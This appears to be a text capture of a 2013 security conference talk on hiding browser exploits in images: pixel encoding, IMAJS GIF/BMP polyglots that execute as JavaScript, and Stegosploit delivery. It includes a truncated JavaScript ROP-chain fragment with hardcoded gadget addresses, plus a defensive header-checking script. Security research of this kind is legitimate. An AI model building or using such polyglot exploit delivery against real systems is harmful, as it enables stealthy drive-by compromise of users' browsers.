
Deadly pixels - NSC 2013

Information about Deadly pixels - NSC 2013
Technology

Published on May 16, 2013

Author: saumilshah

Source: slideshare.net

Description

My presentation at NoSuchCon 2013, Paris. What do you get if you combine art with an exploit? "Deadly Pixels" is the fine art (pun intended) of packaging exploits. The result is a pretty picture with not-so-pretty after effects.

Download PDF - http://www.nosuchcon.com/talks/D1_05_Saumil_Deadly_Pixels.pdf

net-square
Deadly Pixels
Saumil Shah, NoSuchCon 2013

Deadly Pixels, presented by Saumil Shah

One day,
A mad meta-poet,
With nothing to say,
Wrote a mad meta-poem
That started "One day,
A mad meta-poet
With nothing to say...

#who am i
CEO, Net-Square
Reverse Engineering, Exploit Writing, Penetration Testing, Offensive Security, Attack Defense, Conference Speaker, Conference Trainer
Web 2.0 HTML5 XSS CSRF SQLi CORS XST clickjacking AJAX FLASH RIA SOAP Web Services UXSS XPATHi ....... <insert buzzwordy appsec jargon here>

You either have an 0-day...

...OR IT'S HOW YOU USE IT

A successful exploit...
...is one that is delivered properly.

Stealth Techniques Today
•  JS Obfuscation
•  Broken File Formats
•  OLE Embedding
•  Javascript/Actionscript
•  Spreading the payload

Exploit Success Factors
•  Is it fresh?
•  Is there a patch?
•  Can it be detected?

Putting together what I know
Web Hacking
Binary Exploits

SNEAKY
LETHAL

Hiding In Plain Sight

Exploits as Grayscale Images
•  Grayscale encoding (0-255).
•  1 pixel = 1 character.
•  Perfectly valid image.
G r e e t i n g s   P r o f e s s o r   F a l k e n

I'm an evil Javascript
I'm an innocent image

function packv(n) {
  var s = new Number(n).toString(16);
  while (s.length < 8) s = "0" + s;
  return (unescape("%u" + s.substring(4, 8) + "%u" + s.substring(0, 4)));
}
var addressof = new Array();
addressof["ropnop"] = 0x6d81bdf0;
addressof["xchg_eax_esp_ret"] = 0x6d81bdef;
addressof["pop_eax_ret"] = 0x6d906744;
addressof["pop_ecx_ret"] = 0x6d81cd57;
addressof["mov_peax_ecx_ret"] = 0x6d979720;
addressof["mov_eax_pecx_ret"] = 0x6d8d7be0;
addressof["mov_pecx_eax_ret"] = 0x6d8eee01;
addressof["inc_eax_ret"] = 0x6d838f54;
addressof["add_eax_4_ret"] = 0x00000000;
addressof["call_peax_ret"] = 0x6d8aec31;
addressof["add_esp_24_ret"] = 0x00000000;
addressof["popad_ret"] = 0x6d82a8a1;
addressof["call_peax"] = 0x6d802597;
function call_ntallocatevirtualmemory(baseptr, size, callnum) {
  var ropnop = packv(addressof["ropnop"]);
  var pop_eax_ret = packv(addressof["pop_eax_ret"]);
  var pop_ecx_ret = packv(addressof["pop_ecx_ret"]);
  var mov_peax_ecx_ret = packv(addressof["mov_peax_ecx_ret"]);
  var mov_eax_pecx_ret = packv(addressof["mov_eax_pecx_ret"]);
  var mov_pecx_eax_ret = packv(addressof["mov_pecx_eax_ret"]);
  var call_peax_ret = packv(addressof["call_peax_ret"]);
  var add_esp_24_ret = packv(addressof["add_esp_24_ret"]);
  var popad_ret = packv(addressof["popad_ret"]);
  var retval = ""

<CANVAS>

See no eval()

Same Same No Different!
var a = eval(str);
a = (new Function(str))();

IMAJS
I iz a Javascript

IMAJS: Javascript, as an Image!

IMAJS-GIF Browser Support

Height  Width  Browser/Viewer    Image Renders?  Javascript Executes?
2f 2a   00 00  Firefox           yes             yes
2f 2a   00 00  Safari            yes             yes
2f 2a   00 00  IE                no              yes
2f 2a   00 00  Chrome            yes             yes
2f 2a   00 00  Opera             ?               ?
2f 2a   00 00  Preview.app       yes             -
2f 2a   00 00  XP Image Viewer   no              -
2f 2a   00 00  Win 7 Preview     yes             -

IMAJS-BMP Browser Support

Height  Width  Browser/Viewer    Image Renders?  Javascript Executes?
2f 2a   00 00  Firefox           yes             yes
2f 2a   00 00  Safari            yes             yes
2f 2a   00 00  IE                yes             yes
2f 2a   00 00  Chrome            yes             yes
2f 2a   00 00  Opera             yes             yes
2f 2a   00 00  Preview.app       yes             -
2f 2a   00 00  XP Image Viewer   yes             -
2f 2a   00 00  Win 7 Preview     yes             -
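
The IMAJS tables list 2f 2a 00 00 as the header bytes of every tested image, and 2f 2a is ASCII for "/*". As an added example (not code from the talk), this Node.js check flags GIF and BMP files whose first header field starts with those bytes and reports the header anomalies that follow from them; the field offsets are assumptions taken from the GIF and BMP file layouts, and the sample buffers are constructed.

```javascript
// Added example, not code from the talk. Field offsets are assumptions
// taken from the GIF and BMP layouts; all sample buffers are constructed.
const COMMENT_OPEN = Buffer.from([0x2f, 0x2a]); // "/*", the bytes in the tables

function inspectImage(buf) {
  const findings = [];
  const head = buf.subarray(0, 6).toString("latin1");
  if (head === "GIF87a" || head === "GIF89a") {
    if (buf.length < 10) return { format: "GIF", findings: ["truncated header"] };
    // Two 16-bit little-endian screen dimensions follow the 6-byte magic.
    const dims = [buf.readUInt16LE(6), buf.readUInt16LE(8)];
    if (buf.subarray(6, 8).equals(COMMENT_OPEN)) {
      findings.push('dimension field starts with 2f 2a ("/*")');
    }
    if (dims.includes(0)) findings.push(`zero dimension (${dims.join(" x ")})`);
    return { format: "GIF", findings };
  }
  if (head.startsWith("BM")) {
    if (buf.length < 6) return { format: "BMP", findings: ["truncated header"] };
    // A 32-bit little-endian file size follows the 2-byte magic.
    const declared = buf.readUInt32LE(2);
    if (buf.subarray(2, 4).equals(COMMENT_OPEN)) {
      findings.push('size field starts with 2f 2a ("/*")');
    }
    if (declared !== buf.length) {
      findings.push(`declared size ${declared} != actual ${buf.length}`);
    }
    return { format: "BMP", findings };
  }
  return { format: null, findings };
}

// Constructed header-only samples (no image data, no script content).
function sample(magic, fieldBytes, total) {
  const buf = Buffer.alloc(total);
  buf.write(magic, 0, "latin1");
  Buffer.from(fieldBytes).copy(buf, magic.length);
  return buf;
}
const SAMPLES = {
  gifPlain: sample("GIF89a", [0x01, 0x00, 0x01, 0x00], 16),
  gifFlagged: sample("GIF89a", [0x2f, 0x2a, 0x00, 0x00], 16),
  bmpPlain: sample("BM", [0x10, 0x00, 0x00, 0x00], 16),
  bmpFlagged: sample("BM", [0x2f, 0x2a, 0x00, 0x00], 16),
};

for (const [name, buf] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(inspectImage(buf)));
}
```

For user-supplied images, serving them with their real image Content-Type together with `X-Content-Type-Options: nosniff` makes browsers refuse to load them as script.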

Stegosploit!

Demo
IMAJS stego FTW!

IMAJS "loader" script
Alpha encoded exploit code

The Near Future
HTML5, CANVAS, Heap Spray, WebGL, Cyber Cloud BYOD

Were the words that the mad poet
Finally chose,
To bring his mad poem
To some
"sort of close".

@therealsaumil
saumil@net-square.com
